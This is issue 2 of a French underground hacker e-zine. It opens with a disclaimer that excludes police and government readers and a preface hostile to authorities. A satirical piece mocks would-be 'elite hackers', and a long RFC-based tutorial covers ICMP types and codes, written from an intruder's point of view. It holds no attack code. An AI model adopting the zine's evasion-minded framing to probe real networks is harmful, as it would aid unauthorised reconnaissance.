-------------------------------------------------------------------------------------------- C . H . G . Cyber Hacker's Guide II -------------------------------------------------------------------------------------------- Disclaimer : Attention :Le contenu de ce mag peut heurter la sensibilit‚ de certaines personnes.Veuillez attentivement lire ce qui suit, si vous souhaitez continuer la lecture de ce document. Tout ce qui est contenu dans ce mag n'est pr‚sent qu'… titre indicatif. Nous vous rappelons qu'acc‚der, de fa‡on consciente ou non … un ou des systŠmes, ou exc‚der les droits d'accŠs allou‚s, et par ce comportement, obtenir n'importe quel type d'information est ill‚gal. Causer l'interruption d'un programme, d'informations, de code, de commandes sur un systŠme sans autorisation est ill‚gal. Cyber-Hack ainsi que les autres auteurs de ce mag n'assume absolument aucunes responsabilit‚s des cons‚quences que pourrait avoir sur vous ou votre environnement tout ce qui est pr‚sent dans ce zine. Cyber-Hack et tout ce qui s'y rattache ne peut ˆtre tenu comme responsable d'une mauvaise utilisation de ce qui est pr‚sent‚ ici. Attention, toutes les informations sont fournies "tel quel", la pr‚cision ou la justesse des informations pr‚sentes dans ce mag sont sujettes … des conjectures. Aucune garantie implicite, ou non implicite, et d'aucun type que ce soit n'est assur‚e par Cyber-Hack ou par tous ceux qui s'y rattachent de prŠs ou de loin. Vous utilisez les informations qui sont fournies dans ce mag … vos propres risques! Cependant nous nous engageons … essayer de fournir le moins d'informations erron‚es qu'il nous est possible. Si vous utilisez des sources ou des textes pr‚sent‚s ici, nous vous demandons que leur origine soit cit‚e. Tous les personnages mentionn‚s dans cet e-zine sont purement et simplement fictifs. Toutes ressemblances avec des personnes, vivantes ou d‚c‚d‚es, est purement accidentelle et n'est le fruit que de la co‹ncidence. Finalement :la lecture de ce document est r‚serv‚ aux seuls membres de l'underground informatique qui agr‚ant aux points pr‚c‚dents ne font pas partie des cat‚gories suivantes : employ‚ d'un ‚tat, d'une institution et/ou agence gouvernementale, de la police, de l'arm‚e, de la SEFTI, de la DST, de la DGSE, de la GRC ou de toute organisation affili‚e de prŠs ou de loin aux pr‚c‚dentes ainsi qu'… toutes personne ayant un rapport direct ou indirect avec un quelconque service similaire. L'accŠs a ce texte par ces mˆmes personnes ou institutions constituent donc une violation du copyright car cela revient … lire des informations propri‚taires ! (c) constituant ainsi une atteinte … la vie priv‚e.. A bon entendeur.... L'‚quipe de Cyber-Hack. Pr‚face : Et oui voil… que sort le num‚ro 2 du Cyber Hacker's Guide... Dans l'ensemble le mag a ‚t‚ bien accueuilli; bien mieux que ce que j'avais esp‚r‚, alors nous allons continuer. Vous avez probablement tous lu : Altern.org condamn‚ … payer plus de 400000 francs … cause d' une pouf … poil... Ca s'est un peu arrang‚ mais bon....ca me d‚goute, Serge Humpich vol‚ et musel‚ par GIE... tandis que les services affili‚s … la r‚pression du crime informatique se multiplient et se complaisent dans leur ignorance de l'underground... Si j'ai eu un jour une once d'espoir dans les pouvoirs politiques, ce devait ˆtre dans une autre vie. Ne vous leurrez pas, tous ces gars l… sont pourris avec tous ceux qui les entourent !! Alors moi je n'ai qu'une chose … dire : c'est que nous devons leur montrer que nous ne sommes pas des boeufs … la raison ‚triqu‚e qu'on mŠne par le bout du nez. On sait penser par nous mˆme et raisonner, une facult‚ qui est aujourd'hui un v‚ritable tr‚sor ! Sachez le conserver et vous en servir ! Mˆme si en ce moment les sites underground, les teams et les zines fleurissent, c'est aussi le cas de ceux qui cherchent … nous d‚nigrer ou … nous tourner … la d‚rision... Un exemple ? allez,en plus je lui fais de la pub : http://www.chez.com/zipiz. Alors comme vous pouvez trŠs bien l'imaginer nous sommes toujours … la recherche d'auteurs pour ‚crire dans ce zine. Bon je crois que j'ai bien assez parl‚ ;) alors.... Bonne lecture! #Brain Override# -------------------------------------------------------------------------------------------- TABLE DES MATIERES -------------------------------------------------------------------------------------------- I] Comment devenir un ‚lite hacker sans connaŒtre une goutte d'informatique !!! #Illegal# II] Les services ICMP #Brain.Override# III] Quelques trucs de hackers pour un monde meilleur !!! #Illegal# IV] Les failles made in 3COM #Brain.Override# V] Liste des ports par d‚faut utilis‚s par les trojans #Brain.Override# VI] Liste de quelques sites int‚ressants #Brain.Override# VII] Conseal Pc firewall... #Brain.Override# VIII] ZIPIZ #Brain.Override# IX] Un d‚codeur de tonalit‚ #Brain.Override# X] Qu'est-ce qu'un Hacker ? #Brain.Override# -------------------------------------------------------------------------------------------- I] COMMENT DEVENIR UN ELITE HACKER SANS CONNAITRE UNE GOUTTE D'INFORMATIQUE !!! Le but de cet article est de permettre a un plus grand nombre, parmis vous, de rentrer dans ce monde ferm‚ des hackers. Quelques restrictions: ˆtre ag‚ de 15 voir 16 ans, c'est un maximum. A partir de 25 ans, tout hacker se considŠre d‚j… lui mˆme comme un grand gouroux ‚lite hacker a donf. Par contre, avoir 15 ans et dire ouvertement: "Je suis le plus jeune Elite Hacker", ca c' estle must. 2Šme restriction en fonction du pays: Pour un hacker Francais: Avoir de grosses lunettes, ˆtre boutonneux, boire du coca, fumer comme un pompier et avoir les cheveux gras. Pour un hacker Ricains: L…, on doit obligatoirement avoir un look CoWbOyzzz. Lunettes noires de rocker, blouson perfecto, cheveux long, boire de la BUD, porter des rangers et surtout terminer toutes ses phrases par "_". Premierement: Le choix du pseudo. Evites absolument les pseudos type: ZIZIPANPAN, GOLDORAK, TINTIN, car n'oublies pas que dans le monde des hackers tu sera jug‚ non pas sur tes comp‚tences, mais surtout sur ce que tu repr‚sentes, choisi plut“t un pseudo comme: BRAIN OVERRIDE, ARCHANGEL, EL CONDOR, DOMINIX, TOTAL ANNIHILITION, DOOM, ILLEGAL L…, d‚j…, rien qu'avec un pseudo comme ‡a, tu fais peur. Bon, ensuite, il va falloir rentrer dans le monde hacker, une seul solution, passer … l'attaque. Personnellement, je pr‚coniserais la technique dite du "lonely Hacker" dite ‚galement technique du "hacker solitaire". Se pointer, en pleine heure de pointe dans un magazin type SURCOUF ou FNAC, choisir absoluement un magazin informatique, j'ai essay‚ au rayon boucherie CASINO, cela na rien donn‚ du tout. Donc, se pointer dans un magazin type SURCOUF, au rayon soft, l… o— il y a plein de monde, et dire haut et fort au vendeur: "EXCUSEZ MOI, JE SUIS A LA RECHERCHE D'UN EDITEUR HEXADECIMAL TYPE HEX EDIT AINSI QUE DE MICROSOFT ASSEMBLEUR et SOFTICE", automatiquement un mec devrait te taper sur l'‚paule et te dire: "EXCUSE MOI MEC, MAIS TU TROUVERAS PAS CA ICI, JE TE DONNE RENDEZ-VOUS DEMAIN A LA MEME HEURE, A TEL ENDROIT". L…, c'est le must, la rencontre dite "rencontre du troisieme type" non seulement tu vas connaŒtre un vrai pirate mais en plus tu vas pouvoir rentrer dans le milieu. En language hacker, on parle alors de SCENE. Mais attention, lors de la rencontre, ne rien dire de trop technique au cas ou!!! Si tu tombes sur un vrai EliTe HaCkEr, tu aurais tout faux. Apres a toi de jouer! DeuxiŠme technique, dite "cyber technique" dite "technique alt.2600": S'abonner au groupe de news "alt.2600" un news group de "Hackers" o— il y a de tout sauf de vrais HaCkErs, et ‚couter les conversations. A un moment donn‚, automatiquement, on va voir une discussion s'enflamer avec plein de r‚ponses type "_ OFF". Suivre surtout un pseudo, ARCHANGEL c'est un mec qui aurait ‚crit "CIA HACKERS" mais personne ne l'a lu. Personnellement, je suis devenu un Elite hackers et prouvant aux autres que ARCHANGEL ‚tait un charlot. Donc,a ce moment l…, rentrer dans la conversation et s'imposer en m‚diateur, et balancer un truc du genre: "Calmez vous les gars!!! On a tous un point commun, le hacking, et la soif de connaissance, alors, faites la paix, c'est exactement ce que le gouvernement voudrait, que l'on se dispute. Unissons nous et nous serons plus fort" Terminer sont message par un petit mot du type: "Si parmis vous, il y a quelques jeunes qui aimeraient connaŒtre et avoir des renseignements sur differentes techniques, qu'ils s'adressent a moi... Vous les jeunes ˆtes notre avenir !!!" L…, automatiquement, tu dois recevoir plein de "mail" du genre: "greeting, you're really an elite and cool hacker, you've got all my respect" en traduisant ca donne: "F‚licitations, vous etes vraiment un hacker d'exception, vous avez tout mon respect" et voila, BINGO, vous ˆtes un Vrai EliTe HaCkEr !!! Bon, va surement aussi arriver le moment de la confrontation type dite "DEF COn Porte d'Italie"... Pas de pannique, souvent, il y aura toujours plus de mecs comme toi que de vrais hacker. Le vrai Hacker ‚tant trop occup‚ pour participer … de telles reunions. Une seule solution, impressionner son monde, acheter un "t shirt" type 2600 le fameux journal de hackers que personne n'a lu, mais que tout le monde connait. Inscrire son pseudo dans le dos, avec "FREE KEVIN' dessus, et en route pour la r‚union de hackers, succŠs garanti. Voila, mon prochain article traitera de la technique dite "CHATTING IRC" et LINUX. Bonne continuation, et n'h‚sitez pas … me transmettre vos avanc‚es personnelles dans le monde des hackers. #!LLEGAL# du groupe L.O.L. (Legion Of Linux) -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- II] Les services ICMP Vous savez probablement tous ce qu'est plus ou moins ICMP. Avant donc de parler des services proprement dit, un petit rappel sur ce qu'est ICMP. Le protocole IP offre un service de remise de datagramme sans connection, cependant il ne tente pas d'assurer une remise fiable de ces mˆmes datagrammes. C'est aux protocoles de couches sup‚rieures tels que TCP, qu'incombe cette tƒche. Il existe cependant un moyen pour le protocole IP, d'envoyer des messages d'alerte et de diagnostic par l'interm‚diaire d'un module. Ce module c'est bien entendu ICMP (Internet Control Message Protocole ou encore : Protocole de message de contr“le Internet). Ces messages ont pour but de permettre de d‚tecter des problŠmes potentiels ou r‚els. En effet, le protocole IP ayant ‚t‚ con‡u dans un souci de simplicit‚, des erreurs surviennent souvent, lors de la transmission d'un datagramme. Ces erreurs sont g‚n‚ralement d‚tect‚es au niveau d'un routeur interm‚diaire comme par exemple si le r‚seau de destination est de type local … diffusion tel qu'un Ethernet, le routeur s'apper‡oit que l'h“te n'est pas disponible au moment o— il utilise l'ARP pour trouver l'adresse mat‚rielle de l'h“te de destination … partir de son adresse IP. Quand ce cas se pr‚sente, le routeur tente d'en informer l'emetteur en envoyant un message ICMP qui indique que l'h“te de destination n'est pas disponible. Il existe bien sur d'autres types de problŠmes comme l'expiration du champ TTL, l'indisponibilit‚ d'un protocole etc.. ICMP est plus simplement, le protocole particulier qui utilis‚ conjointement … IP permet d' alerter le r‚seau sur l'existence d'erreurs, de tester le r‚seau et d'obtenir des infos le concernant. Bon pour r‚sumer disons que : Toutes les impl‚mentations IP doivent impl‚menter le ICMP ICMP est un client de IP (il s'ex‚cute au dessus) bien qu'il soit impl‚menter dans IP. ICMP bien que signalant les condition d'erreur ne rend pas le protocole IP plus fiable. ICMP ne signale les erreurs que pour le premier fragment d'un datagramme. ICMP ne g‚nŠre aucun message d'erreur concenant les problŠmes affectant des datagrammes ICMP. ICMP ne doit pas signaler les problŠmes suivants : Broadcast ou multicast. Routage ou remise des messages ICMP. Diffusion ou multidiffusion au niveau de la couche de liaison de donn‚es. Si vous voulez plus d'infos : RFC 792,950,1812,1122,1256 et 1191. Bon maintenant passons aux services proprement dit. Je suis sur que les petis lamers qui cliquent sur "attaque packet ICMP Destination unreachable" dans leur super 3l33t WareZ WarlordZ programmes n'en soup‡onnent mˆme pas le fonctionnement... ----------------- | Services ICMP | ----------------- | | --------------------------------------------------------------------------- | | | | | | | | -------- | ----------------- | ---------------------------- | --------------- | | Echo | | | Time exceeded | | | Parameter unintelligible | | | Adress mask | | -------- | ----------------- | ---------------------------- | --------------- | | | | | | | | | ------------- --------------------------- ------------ ----------------- | Timestamp | | Destination Unreachable | | Redirect | | Source quench | ------------- --------------------------- ------------ ----------------- Comme vous pouvez le constater, ICMP fournit une gamme assez large de services de messages d'erreur, d'information et de diagnostic. Les principaux services sont list‚s si dessus. Voyons un peu leur utilit‚ : Echo : Ce service est utilis‚ comme un outil de diagnostic et sert … d‚terminer si un noeud IP est accessible. Timestamp : C'est en quelque sorte un "marqueur de temps", en fait il est utilis‚ pour la mesure du temps sur un inter-r‚seau. Time exceeded : C'est le temps ‚coul‚. Ce service est utilis‚ pour indiquer l'expiration de la valeur du champs TTL de l'en-tˆte de l'IP. Destination unreachable : Qu'on peut traduire par destination inaccessible est un service qui indique simplement qu'un noeud IP n'est pas accessible. Parameter unintelligible ou encore parameter problem : Indique un problŠme dans un datagramme IP Redirect : C'est un service utilis‚ par les routeurs pour indiquer une route de substitution Adress mask : Il s'agit du masque d'adresse, c'est … dire que ce service permet d'obtenir des informations de masque de sous-r‚seau pour le r‚seau. Source quench : Ce service sert simplement … indiquer un problŠme de congestion … la source. Quel que soit le message ICMP le format g‚n‚ral reste … peu de choses prŠs le mˆme. Le premier octet de l'en-tˆte ICMP est le champ Type, indiquant le type du service ICMP. L' octet suivant contient une valeur code d‚crivant plus en d‚tail la nature du type de message. Il faut donc consid‚rer les valeurs des champs type ET code pour d‚terminer la valeur exacte du message ICMP. Un petit sch‚ma qui montre la structure g‚n‚rale des messages IP. Octets |--------------------------------------------------------------------------------------- | | 1 | 1 | 2 | 4 | | ICMP | IP | |--------------------------------------------------------------------------------------- | En-tˆte IP | Type | Code | Total de contr“le | ParamŠtre | Informations | Data link | |--------------------------------------------------------------------------------------- | | | | | --------------------------------- | | En-tˆte IP en ‚chec + 64 bits | | | de donn‚es ULP | | --------------------------------- | | | | ----------------------------------------- | Type | ICMP Message | ----------------------------------------- | 0 | Echo reply | | 3 | Destination unreachable | | 4 | Source quench | | 5 | Redirect | | 8 | Echo request | | 11 | Time exceeded | | 12 | Parameter (IP) unintelligible | | 13 | Timestamp request | | 14 | Timestamp reply | | 15 | Information request | | 16 | Information reply | | 17 | Adress mask request | | 18 | Adress mask reply | ----------------------------------------- Bon comme en plus je suis gentil je vais vous donner la liste des valeurs de type pour ICMP --------------------------------------------------------- | Valeur de type | Signification | --------------------------------------------------------- | 0 | Echo reply | | 1 | Unassigned | | 2 | Unassigned | | 3 | Destination Unreachable | | 4 | Source Quench | | 5 | Redirect | | 6 | Alternate Host Address | | 7 | Unassigned | | 8 | Echo | | 9 | Router Advertisement | | 10 | Router Selection | | 11 | Time Exceeded | | 12 | Parameter Problem | | 13 | Timestamp | | 14 | Timestamp Replay | | 15 | Information Request | | 16 | Information Reply | | 17 | Address Mask Request | | 18 | Address Mask Reply | | 19 | Reserved (for security) | | 20-29 | Reserved (for Robustness Experiment) | | 30 | Traceroute | | 31 | Datagram Conversion Error | | 32 | Mobile Host Redirec | | 33 | IPv6 Where-Are-You | | 34 | IPv6 I-AM-Here | | 35 | Mobile Registration Request | | 36 | Mobile Registration Reply | | 37-255 | Reserved | --------------------------------------------------------- Les types ICMP 0 et 8 : Echo/PING Les messages ICMP les plus utilis‚s sont sans doute les types Echo 0 et 8. Il s'agit des messages utilis‚s pour le diagnostic par l'utilitaire PING (Packet Internet Groper). PING permet en effet de v‚rifier qu'un noeud est "vivant" et accessible. Ping fonctionne de la maniŠre suivante : Il envoie un message ICMP de type Requˆte d'‚cho (8) … un noeud IP. A la r‚ception du message, le noeud IP renvoie un message ICMP de r‚ponse d'‚cho (0). Le message de r‚ponse d'‚cho contient une copie des donn‚es envoy‚es dans le message de requˆte d'‚cho. La r‚ception d'un message de r‚ponse d'echo confirme que la couche IP et les couches inf‚rieures du systŠme de transport fonctionnent bien entre la source et la destination. Si des routeurs interm‚diaires sont rencontr‚s entre la source et la destination, le message de r‚ponse d'‚cho indique aussi que les routeurs sont en mesure de transmettre des datagrammes entre la source et la destination. Le noeud IP est g‚n‚ralement un h“te ou un routeur. L'utilitaire PING est utilis‚ pour g‚n‚rer le message de requˆte d'‚cho ICMP. Le module IP qui s'‚x‚cute sur le noeud de destination r‚pond automatiquement aux messages ICMP de requˆte d'‚cho g‚n‚r‚s par PING. Je ne m'‚tendrai pas d'avantage sur les diff‚rentes options et fonctionnalit‚s de PING sur les divers type d'OS. Type ICMP3 : Destination inaccessible. La non remise d'un datagramme est g‚n‚ralement d‚tect‚e par les routeurs, le plus souvent, c'est le dernier routeur de la chaŒne des routeurs du chemin emprunt‚ par le datagramme. Quand un routeur se trouve dans l'incapacit‚ de remettre un datagramme, il en avertit l' emetteur par le biais d'un message ICMP de destination inaccessible. Les protocoles de couche sup‚rieure, tels que TCP, transmettent le message perdu sans connaŒtre la cause de l'‚chec de la remise. Le message ICMP permet dans certains cas d'indiquer … l'emetteur cette cause. Codes pour le message Destination inaccessible --------------------------------------------------------------------------------- | Code | Signification | --------------------------------------------------------------------------------- | 0 | Net Unreachable | | 1 | Host Unreachable | | 2 | Protocol Unreachable | | 3 | Port Unreachable | | 4 | Fragmentation Nedded and Don't Fragment was Set | | 5 | Source Route Failed | | 6 | Destination Network Unknow | | 7 | Destination Host Unknow | | 8 | Source Host Isolated | | 9 | Communication with Destination Network is Administratively Prohibited | | 10 | Communication with Destination Host is Administratively Prohibited | | 11 | Destination Network Unreachable for Type of Service | | 12 | Destination Host Unreachable for Type of Service | | 13 | Communication Administratively prohibited because of firewalls | | 14 | Host Precedence Violation | | 15 | Precedence cut-off in effect | --------------------------------------------------------------------------------- Code 0 : R‚seau inaccessible Cette valeur est g‚n‚r‚e lorsque le r‚seau sp‚cifi‚ dans l'adresse IP de destination est introuvable. Seuls les routeurs peuvent g‚n‚rer ce message. La cause peut ˆtre l'erreur dans l'IP de destination ou dans la table de routage du routeur g‚n‚rant le message ICMP. L'adresse source contenue dans l'en-tˆte IP transportant ce message identifie le routeur ayant g‚n‚r‚ l'erreur. Code 1 : H“te inaccessible Cette valeur est g‚n‚r‚e par le routeur qui est directement connect‚ au r‚seau de destination. Elle indique que le datagramme a ‚t‚ remis avec succŠs par les routeurs mais que le dernier routeur se trouve dans l'incapacit‚ de communiquer avec l'h“te. Les causes peuvent ˆtre multiples : routeur qui ne parvient pas … d‚terminer l'adresse mat‚rielle de destination … l'aide du protocole ARP, h“te hors service, mal configur‚ ou IP sp‚cifi‚e incorrecte. C'est l'adresse source contenue dans l'en-tˆte IP qui transporte le message ICMP qui identifie le routeur qui … g‚n‚r‚ l'erreur. Ce type de message d'erreur (code 1) implique un ‚chec dans la remise tandis que les messages d'erreur de type code 0 impliquent un ‚chec lors du routage. Code 2 : Protocole inaccessible Ce code est g‚n‚r‚ pas lh“te de destination. Il indique que le datagramme a bien atteint l'h“te de destination mais que le protocole de couche sup‚rieure, transport‚ par le datagramme IP et identifi‚ par le champs protocole de l'en-tˆte IP, n'est pas disponible. Les protocoles de couche sup‚rieure les plus courant sur les h“tes TCP/IP sont TCP, UDP et OSPF. La majorit‚ des h“tes TCP/IP prennent au moins en charge TCP et UDP. Un message ICMP qui indique qu'un tel protocole est inaccessible est signe d'un grave problŠme de configuration au niveau de l'h“te. Dans la majorit‚ des cas, les systŠmes TCP/ip mettent en place des donn‚es sp‚cifiques pour la configuration. Par ex sous UNIX le fichier /etc/protocols. Code 3 : Port inaccessible Ce code est g‚n‚r‚ lorsque le protocole de couche de transport indiqu‚ est incapable de d‚multiplexer le datagramme et ne dispose pas d'autre moyen pour en informer l'emetteur. La cause peut ˆtre par ex l'absence d'un service d'application sp‚cifique au niveau de l'hote de destination. Les services d'application sont identifi‚s par des num‚ros de port TCP ou UDP. Sur la pluspart des systŠmes, ces services sont lanc‚s aprŠs lecture de fichiers de configuration d‚di‚s, (ex sous Unix : /etc/inetd.conf) lors de l'initialisation du systŠme TCP/IP. A notre aussi que de nombreux systŠmes emploient le concept de processus de serveur,appel‚ le superdemon inetd, qui ‚coute les requˆtes arrivant sur les num‚ros de port de service d'application. Il arrive lorque le processus de serveur n'est pas activ‚ que les services d'application soient indisponibles. Code 4 : Fragmentation n‚cessaire et flag Ne pas fragmenter est activ‚ Ce code est g‚n‚r‚ par les routeurs qui doivent fragmenter le datagramme parce que la taille de MTU de l'interface de r‚seau par laquelle doit trasiter le datagramme est inf‚rieure … celle du datagramme. Si dans l'en-tˆte IP du datagramme, le flag (DF) est mis … 1, le routeur ne peut transmettre le datagramme et doit donc l'‚carter. Il envoie alors … l' emetteur initial un message ICMP de type 3 signalant que le datagramme n'a pu ˆtre envoy‚, le code 4 en indiquant la raison. Code 5 : Echec du source route Ce code est (encore) g‚n‚r‚ par un routeur. Il est g‚n‚r‚ seulement pour les datagrammes IP utilisant l'option IP Source Route. Si un routeur se trouve dans l'incapacit‚ de transmettre le datagramme en respectant le chemin de source route, il doit ‚carter le datagramme, puis envoyer … l'‚metteur un message ICMP type 3 code 5, indiquant que la source route a ‚chou‚. L'identit‚ du routeur qui a g‚n‚r‚ ce message peut ˆtre trouv‚ en examinant le champ d'adresse source de l'en-tˆte IP du message ICMP. Le message ICMP Echec source route doit contenir une option source route de mˆme type (strict ou loose), cr‚‚e en prenant dns l'option de source route du datagramme initial la portion du champ d'option situ‚e avant le pointeur de route enregistr‚e, et en l'inversant. Le seul cas o— les champs de source route du datagramme fautif ne sont pas utilis‚s se rencontre lorsqu'un message ICMP ProblŠme de paramŠtre concernant une source route est envoy‚, ou lorsque le routeur a connaissance de rŠglements qui empˆcheraient la remise du message ICMP utilisant les informations de source route du datagramme initial. Code 6 : R‚seau de destination inconnu Ce message n'est jamais g‚n‚r‚ sur un r‚seau r‚el, car le routeur pr‚fŠrer g‚nerer un message de type 3 code 0, ce code est obsolŠte. En th‚orie, il ‚tait suppos‚ ˆtre g‚n‚r‚ par un routeur lorsque celui-ci aurait d‚tect‚, en consultant sa table de routage un r‚seau de destination inconnu Code 7 : H“te de destination inconnu Ce code est g‚n‚r‚ par un routeur lorsque celui-ci peut d‚tecter, par le biais du logiciel de couche de liaison situ‚ au niveau de son interface de r‚seau, que l'h“te de destination n'existe pas. Le protocole de couche de liaison de donn‚es pour les liaisons point to point peut d‚tecter l'existence de p‚riph‚riques … chacunes des extr‚mit‚s de la liaison. Si un routeur est connect‚ … l'h“te de destination via un r‚seau local … diffusion tel qu' Ethernet, le routeur ne peut d‚terminer que l'h“te n'existe pas. Dans le cas d'un r‚seau local, le routeur envoie une requˆte ARP pour d‚terminer l'adresse mat‚rielle, et s'il ne re‡oit pas de r‚ponse, il suppose que l'h“te de destinatino est inaccessible. Les routeurs doivent utilis‚r de messages code 1 ou code 7 lorque d'autres h“ttes du mˆme r‚seau de destination sont accessibles, sinon l'emetteur pourrait conclure … tort que tous les h“tes du r‚seau sont inaccessibles. Code 8 : H“te source isol‚ STD3, qui est d‚crit par le RFC 1122, d‚finit un message de code 8. Ce message est g‚n‚r‚ lorsqu'un routeur peut d‚tecter que l'h“te source est isol‚ du reste du r‚seau. Toutefois, le RFC 1812 d‚clare que les routeurs ne doivent pas g‚n‚rer de messages de code 8 mais doivent utiliser plut“t un code 0 ou code 1, selon la circonstance. Les codes 8 sont donc obsolŠtes. Codes 9 et 10 : communication avec le r‚seau/h“te de destination inter. par l'administrateur Un code 9 indique que la communication avec le r‚seau de destination est interdite administrativement tandis que le code 10 indique que c'est la communication avec l'h“te de destination qui est interdite. Les codes 9 et 10 furent con‡us pour ˆtre utilis‚s par des p‚riph‚riques de chiffrement point … point des agences militaires am‚ricaines. Le RFC 18112 d‚clare que les routeurs doivent utiliser le code 13 nouvellement d‚fini (communication interdite par l' administrateur) dans le cas d'un filtrage adminstratif des paquets. Codes 11 et 12 : R‚seau/H“te de destination inaccessible pour le type de service Ces messages sont g‚n‚r‚s si un routeur est incapable de transmettre le datagramme … un r‚seau ou … un h“te de destination parce que les routes de sa table de routage ne peuvent trouver le type de service (TOS) demand‚, ou la valeur de TOS par d‚faut. La valeur de TOS est sp‚cifi‚e dans l'en-tˆte IP du datagramme et permet de sp‚cifier la pr‚s‚nce, le retard , le d‚bit et le co–t du chemin suivi par le datagramme. Un code 11 indique que le r‚seau de destination est inaccessible pour le TOS sp‚cifi‚, un code 12 insique que c'est l'h“te de destination qui est inaccessible. Code 13 : Communication interdite par l'administrateur du fait d'un coupe-feu La pluspart des routeurs r‚cents disposent d'un logiciel de filtrage des paquets permettant de mettre en place des rŠgles de filtrage interdisant la transmission de paquets au vu de l'adresse IP, du type de protocole, des num‚ros de port sp‚cifi‚s, etc. Ce filtrage est une mesure de s‚curit‚ et constitue la premiŠre ligne de d‚fense contre des intrusions hostiles. L'impl‚mentation d'un routeur peut envoyer des messages ICMP indiquant que le datagramme n'a pu ˆtre transmis pour des raisons administratives. Malheureusement pour nous (mais beaucoup ne le font pas), le routeur peut ˆtre configur‚ pour ne pas envoyer de tels messages. Dans ce cas aucun message d'erreur ICMP ne sera renvoy‚ pour chaque paquet refus‚ administrativement. De cette maniŠre, le routeur ne risque pas de donner des informations suppl‚mentaires … l'‚metteur des paquets suspects. Code 14 : Violation de pr‚seance d'h“te Ce message est g‚n‚r‚ par le routeur de premier pas c'est … dire le premier routeur que le datagramme doit franchir pour atteindre sa destination. Ce message ICMP est g‚n‚r‚ pour indiquer que la pr‚s‚ance demand‚e n'est pas permise pour l'adresse source-destination sp‚cifi‚e, pour le protocole de couche sup‚rieure ou pour les num‚ros de port source-destination Le routeur peut ‚galement ˆtre configur‚ de maniŠre … ne pas renoyer de message de code 14. Code 15 : Precedence cut-off in effect Ce code est ‚galement g‚n‚r‚ par un routeur. Un administrateur peut sp‚cifier un niveau de pr‚s‚ance minimale, requis pour une route sp‚cifique de la table de routage. Si le datagramme a ‚t‚ envoy‚ avec une pr‚s‚ance inf‚rieure, il ne peut ˆtre transmis par cette route. Si le datagramme doit ˆtre ‚cart‚, un message ICMP type 3 code 15 est envoy‚ … l' ‚metteur. Le routeur peut ˆtre dans ce cas aussi configur‚ pour ne pas g‚n‚rer de code 15. Le type ICMP 4 : source Quench. Le r‚seau IP est sans connexion. Les routeurs d'un r‚seau IP transmettent les datagrammes IP unit‚ par unit‚ et ne r‚servent pas de m‚moire pour les datagrammes d'une session particuliŠre. Le concept mˆme de session est ‚tranger au processus de routage. Il est donc possible que des routeurs connaissent une congestion temporaire, c'est … dire un ‚tat dans lequel il n'y a plus assez de m‚moire ou de place dans le tampon pour que le routeur puisse stocker les datagrammes entrants. Lorsqu'une congestion survient, plusieurs routeurs du r‚seau peuvent ˆtre affect‚s. Les datagrammes entrants peuvent ne pas ˆtre trait‚s imm‚diatemment parce que le routeur est occup‚ … traiter d'autres datagrammes. Les tampons sont utilis‚s par les routeurs pour stocker temporairement les datagrammes avant traitement et transmission. Les routeurs connect‚s … des liaisons lentes sont osuvent la proie de congestion, mais ce peut ˆtre ‚galement le cas de routeurs disposant de peu de m‚moire ou de puissance de calcul limit‚e. Lorsqu'un routeur subit une congestion et que ses tampons sont pleins, il doit ‚carter les datagrammes entrants. Le routeur g‚nŠre alors des messages ICMP Source Quench pour demander aux ‚metteurs de ralentir la fr‚quence de leurs envois. Le message Source Quench est un m‚canisme assez rudimentaire de r‚gulation de flux, destin‚ … ‚viter que les routeurs ne soient submerg‚s par les datagrammes entrants. Il n'existe pour l'instant aucun message ICMP permettant d'annuler ou d'inverser le message Source Quench pour indiquer que la congestion a cess‚. Les problŠmes de contr“le de flux sont mieux trait‚s par les protocoles de couche de transport tels que TCP, responsables de la remise fiable des donn‚es. Voir pour plus d'infos les RFC 1122 1106 et 1812 Le type ICMP 5 : Redirection Ce type de message est envoy‚ par un routeur chaque fois que celui-ci d‚tecte qu'un autre routeur propose un chemin optimal pour le datagramme. Les routeurs ‚changent des informations de routage sur le r‚seau … l'aide d'un protocole de routage. A chaque instant, les routeurs disposent d'informations optimales ou presque, concernant les routes possibles dans le r‚seau. Quant aux h“tes, ils ne disposent que d'informations de routage minimales. Un h“te ne connaŒt g‚n‚ralement que quelques r‚seaux et le routeur de prochain pas permettant d'acc‚der … chacun de ces r‚seaux. Les routeurs de prochain pas sont les routeurs situ‚s … un pas (hop) de la source. Autrement dit, l'h“te source et ses routeurs de prochain pas sont connect‚s directement. De plus les h“tes disposent g‚n‚ralement d'un routeur par d‚faut, utilis‚ pour transmettre les datagrammes vers toutes les destinations qui ne figurent pas explicitement dans la table de routage de l'h“te. L'initialisation de la table de routage d'un h“te se fait g‚n‚ralement au d‚marrage du systŠme. Les informations de cette table figurent dans la zone de donn‚es de configuration de l'h“te, la pluspart du temps sous forme de fichiers. Si la topologie du r‚seau change, les routeurs prennent connaissance des nouvelles routes permettant d'atteindre les diff‚rentes destinations, car les protocoles de routage qu'ils utilisent leur permettent d'‚changer des informations sur la topologie et conservent des tables de routage qui ne sont plus optimales. A la r‚ception d'un message ICMP Redirection, les h“tes doivent mettre … jour leur table de routage en tenant compte des nouvelles informations concernant le nouveau routeur. Le prochain datagramme envoy‚ … la mˆme destination devra utiliser la route optimale mentionn‚e dans le message Redirection. Toutefois certaines impl‚mentaions d'h“te TCP/IP ignorent purement et simplement les messages ICMP de redirection chaque fois qu'un datagramme est envoy‚ au routeur non optimal. Le routeur qui g‚nŠre le message ICMP de redirection transmet aussi le datagramme au routeur optimal. Comme cette transmission peut se faire sur le r‚seau qui a re‡u le datagramme, le nombre de datagrammes transmis est doubl‚ La pr‚sence de messages ICMP indique la possibilit‚ que des routes ne soient pas optimales. Valeurs des codes pour le message ICMP de redirection ------------------------------------------------------------------------ | Code | Signification | ------------------------------------------------------------------------ | 0 | Rediriger le datagramme pour le r‚seau (ou sous r‚seau) | | 1 | Rediriger le datagramme pour l'h“te | | 2 | Rediriger le datagramme pour le Type de Service et le r‚seau | | 3 | Rediriger le datagramme pour le Type de Service et l'h“te | ------------------------------------------------------------------------ Les messages de code 0 et de code 2 s'appliquent … tous les h“tes du r‚seau sp‚cifi‚. Le code 3 est g‚n‚r‚ lorsque le paquet qui a provoqu‚ le message de redirection ICMP doit ˆtre envoy‚ par un chemin qui d‚pendrait, en partien du TOS demand‚. Pour que les routeurs puissent g‚n‚rer ce type de message il faut imp‚rativement uqe les conditions suivantes soient v‚rifi‚es : Le datagramme est transmis vers l'ext‚rieur par l'interface physique utilis‚e pour sa r‚ception. L'adresse IP source figurant dans les paquets est sur le mˆme (sous) r‚seau IP que l' adresse IP de prochain pas. Le datagramme ne contient pas une option IP Source route. 